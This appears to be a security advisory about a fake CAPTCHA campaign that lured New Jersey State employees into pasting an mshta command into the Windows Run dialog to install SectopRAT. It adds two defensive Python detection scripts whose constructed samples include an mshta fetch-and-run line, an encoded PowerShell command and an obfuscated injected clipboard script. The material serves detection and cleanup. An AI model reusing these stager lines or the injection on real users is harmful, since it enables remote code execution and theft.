A recently discovered fake CAPTCHA malware campaign targeted New Jersey State employees in an attempt to deliver the SectopRAT infostealer. The emails contain links that direct targets to malicious or compromised websites, which then present a deceptive CAPTCHA verification challenge. In the background, the visited website copies a command to the target’s clipboard. The CAPTCHA prompts the target to verify their identity by opening a Windows Run dialog box and pasting and running the copied command.

The first part of the command invokes a legitimate Windows executable, mshta[.]exe, to fetch a malicious file from the specified domain and run it. The fetched file may carry a misleading extension such as html, mp3, mp4, jpg, jpeg, or swf, among others. This first part of the command is purposefully obfuscated so that the target only sees the last part of the pasted content, which reads “I am not a robot – reCAPTCHA Verification ID: ####”, in the Windows Run dialog box; this prompts the user to click OK to “verify” their identity. If completed, the encoded PowerShell command runs in the background, and the target inadvertently downloads and executes SectopRAT.
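The chain described above leaves a recognisable trace in endpoint telemetry: mshta.exe launched by explorer.exe (the Run dialog's parent) with a remote URL whose extension does not look like an HTA, the decoy text still sitting on the command line, and PowerShell spawned underneath mshta.exe with an encoded command. The script below is an added example, not code from the advisory, that applies those checks to constructed process-creation records (fields loosely modelled on Sysmon Event ID 1 / Windows 4688) and to Run-dialog history exported from the RunMRU registry key. The domain, the base64 string, and the field layout are constructed placeholders; the decoy separator (`#`) is an assumption.

```python
import re
from pathlib import PureWindowsPath

# Heuristics grounded in the advisory: remote content fetched by mshta, a
# media/document extension standing in for an .hta, the "I am not a robot"
# decoy text, and an encoded PowerShell second stage.
REMOTE_URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
DISGUISED_EXT = re.compile(r"\.(html|mp3|mp4|jpg|jpeg|swf)(\?|$)", re.IGNORECASE)
DECOY_TEXT = re.compile(r"I am not a robot|reCAPTCHA Verification", re.IGNORECASE)
ENCODED_PS = re.compile(r"-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.IGNORECASE)


def _basename(path):
    """Lower-cased image name without a trailing .exe ('mshta', 'powershell', ...)."""
    name = PureWindowsPath(path).name.lower()
    return name[:-4] if name.endswith(".exe") else name


def analyse_event(event):
    """Return the reasons a process-creation record matches the fake-CAPTCHA chain.

    An empty list means nothing in the record matched. Input is a dict with the
    keys 'image', 'parent' and 'cmdline'.
    """
    image = _basename(event["image"])
    parent = _basename(event.get("parent", ""))
    cmd = event["cmdline"]
    reasons = []
    if image == "mshta":
        urls = REMOTE_URL.findall(cmd)
        if urls:
            reasons.append("mshta.exe fetching remote content: " + urls[0])
            if any(DISGUISED_EXT.search(u) for u in urls):
                reasons.append("remote file uses a media/document extension rather than .hta")
            if parent == "explorer":
                reasons.append("launched from explorer.exe, consistent with the Run dialog")
    if DECOY_TEXT.search(cmd):
        reasons.append("command line carries the 'I am not a robot' decoy text")
    if image in ("powershell", "pwsh"):
        if parent == "mshta":
            reasons.append("PowerShell spawned by mshta.exe (second stage)")
        if ENCODED_PS.search(cmd):
            reasons.append("PowerShell started with an encoded command")
    return reasons


def triage_runmru(values):
    """Run the same checks over Run-dialog history.

    Values come from HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU,
    where each entry is the typed command followed by '\\1'. Because every entry
    was typed into the Run dialog, explorer.exe is assumed as the parent.
    """
    findings = []
    for value in values:
        cmd = value[:-2] if value.endswith("\\1") else value
        parts = cmd.split()
        image = parts[0] if parts else ""
        reasons = analyse_event({"image": image, "parent": "explorer.exe", "cmdline": cmd})
        if reasons:
            findings.append((cmd, reasons))
    return findings


# Constructed sample records; the domain and base64 blob are placeholders.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\mshta.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": 'mshta https://captcha-verify.invalid/assets/verify.mp4 '
                '# "I am not a robot - reCAPTCHA Verification ID: 4821"'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\mshta.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"},
    {"image": r"C:\Windows\System32\mshta.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"mshta C:\Tools\inventory.hta"},            # local HTA, no remote fetch
    {"image": r"C:\Windows\System32\notepad.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": "notepad.exe notes.txt"},                    # benign
]

SAMPLE_RUNMRU = [
    'mshta https://captcha-verify.invalid/assets/verify.mp4 '
    '# "I am not a robot - reCAPTCHA Verification ID: 4821"\\1',
    "notepad\\1",
]


def report(events=SAMPLE_EVENTS, runmru=SAMPLE_RUNMRU):
    """Return only the flagged items so the caller (or a SIEM job) can act on them."""
    flagged = [(e["cmdline"], analyse_event(e)) for e in events if analyse_event(e)]
    return flagged + triage_runmru(runmru)


if __name__ == "__main__":
    for cmd, reasons in report():
        print(cmd)
        for r in reasons:
            print("   -", r)
```

The checks are deliberately independent so a partial match (for example, mshta.exe fetching a remote `.mp4` without the decoy text) still surfaces; in production the parent-process condition is the strongest single discriminator, since legitimate mshta.exe use is rarely typed into the Run dialog.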

Further analysis indicated that the identified compromised websites used technologies such as the WordPress Content Management System (CMS) platform and JavaScript libraries. A possible point of entry was an outdated PHP form that allowed threat actors to access the system and inject the malicious code. Additionally, the redirect links pointed to URLs on newly registered domains.
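For website administrators asked to find and remove the injected code, the advisory gives two clues: the page writes a command to the visitor's clipboard, and the command invokes mshta with the "I am not a robot" decoy. The following added example (not code from the advisory or from WordPress) walks a site's PHP, JavaScript and HTML files and flags any file that combines a browser clipboard-write call with one of those markers or with common unpacking calls. Which clipboard API and which obfuscation helpers the injected script actually used is not stated in the advisory, so those patterns are assumptions; the sample files are constructed inline in a temporary directory.

```python
import re
import tempfile
from pathlib import Path

# Browser APIs that put text on the clipboard (assumed; the advisory only says
# the site copies a command to the clipboard).
CLIPBOARD_API = re.compile(
    r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy['\"]\s*\)", re.IGNORECASE)
# Strings that tie a clipboard write to the fake-CAPTCHA chain: the mshta
# stager or decoy text from the advisory, plus typical unpacking helpers
# (assumed) used to hide the payload string from casual review.
STAGER_MARKERS = re.compile(
    r"mshta|I am not a robot|reCAPTCHA Verification|atob\s*\(|fromCharCode", re.IGNORECASE)
SCAN_SUFFIXES = {".php", ".js", ".html", ".htm"}


def scan_text(text):
    """Classify one file's contents.

    Returns a dict with the clipboard calls seen, the stager markers seen and a
    'suspicious' flag that is set only when both kinds of evidence co-occur, so
    an ordinary 'copy to clipboard' button is reported but not flagged.
    """
    clipboard = sorted({m.group(0) for m in CLIPBOARD_API.finditer(text)})
    markers = sorted({m.group(0).lower() for m in STAGER_MARKERS.finditer(text)})
    return {"clipboard": clipboard, "markers": markers,
            "suspicious": bool(clipboard) and bool(markers)}


def scan_tree(root):
    """Scan every PHP/JS/HTML file under root; return (path, result) for files
    that use the clipboard at all, suspicious ones first."""
    results = []
    for path in Path(root).rglob("*"):
        if path.suffix.lower() in SCAN_SUFFIXES and path.is_file():
            result = scan_text(path.read_text(encoding="utf-8", errors="replace"))
            if result["clipboard"]:
                results.append((str(path.relative_to(root)), result))
    results.sort(key=lambda item: not item[1]["suspicious"])
    return results


# Constructed samples: one injected footer and one legitimate copy button.
INJECTED_FOOTER = """<?php /* footer.php */ ?>
<script>
  var c = atob("bXNodGEgaHR0cHM6Ly9leGFtcGxlLmludmFsaWQvdi5tcDQ=");
  document.getElementById('cap').onclick = function () {
    navigator.clipboard.writeText(c + ' # "I am not a robot - reCAPTCHA Verification ID: 4821"');
  };
</script>
"""
BENIGN_COPY_BUTTON = """<button onclick="navigator.clipboard.writeText(window.location.href)">
  Copy page link
</button>
"""


def demo():
    """Write the samples to a throwaway site tree and scan it."""
    with tempfile.TemporaryDirectory() as site:
        theme = Path(site) / "wp-content" / "themes" / "demo"
        theme.mkdir(parents=True)
        (theme / "footer.php").write_text(INJECTED_FOOTER, encoding="utf-8")
        (theme / "share.html").write_text(BENIGN_COPY_BUTTON, encoding="utf-8")
        (theme / "style.css").write_text("body{}", encoding="utf-8")  # not scanned
        return scan_tree(site)


if __name__ == "__main__":
    for rel_path, result in demo():
        flag = "SUSPICIOUS" if result["suspicious"] else "clipboard use"
        print(f"{flag:14} {rel_path}  markers={result['markers']}")
```

Treat a hit as a starting point for review rather than proof: the flagged file should be compared against a clean copy of the theme or plugin, and the modification timestamp and the outdated form mentioned above should be examined for how the code arrived.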

What You Should Do

  • If you encounter a suspicious CAPTCHA verification challenge, refrain from visiting the website or taking further action.
  • Keep browsers and anti-virus/anti-malware software up to date.
  • Keep systems up to date and apply patches after appropriate testing.
  • Disable JavaScript in the browser before visiting unknown websites.
  • Website administrators are advised to remove the malicious code and ensure the website is patched and updated.
  • Verify all administrators and update the administrative credentials for the CMS platform.

Have Questions?  Reach out to BMT for assistance!